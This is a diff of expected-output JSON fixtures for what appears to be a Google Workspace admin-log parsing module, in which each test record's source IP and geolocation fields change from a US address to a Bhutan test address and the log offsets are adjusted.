+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -905,7 +841,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -920,27 +856,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7908,
+        "log.offset": 7892,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -965,7 +897,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -981,26 +913,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8364,
+        "log.offset": 8347,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1021,7 +949,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_ADMIN_RESTRICTIONS_PIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1034,26 +962,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8898,
+        "log.offset": 8880,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1074,7 +998,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1087,27 +1011,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9328,
+        "log.offset": 9309,
         "network.name": "network",
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1128,7 +1048,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1141,27 +1061,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 9817,
+        "log.offset": 9797,
         "network.name": "network",
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1182,7 +1098,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_WIRELESS_NETWORK\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1195,27 +1111,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10303,
+        "log.offset": 10282,
         "network.name": "network",
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1236,7 +1148,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_WIRELESS_NETWORK_NAME\",\"value\":\"network\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1249,27 +1161,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 10792,
+        "log.offset": 10770,
         "network.name": "network",
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1290,7 +1198,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1304,26 +1212,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11290,
+        "log.offset": 11267,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1344,7 +1248,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -1355,26 +1259,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 11773,
+        "log.offset": 11749,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1395,7 +1295,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -1406,26 +1306,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 12110,
+        "log.offset": 12085,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1446,7 +1342,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -1457,26 +1353,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 12440,
+        "log.offset": 12414,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1497,7 +1389,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}",
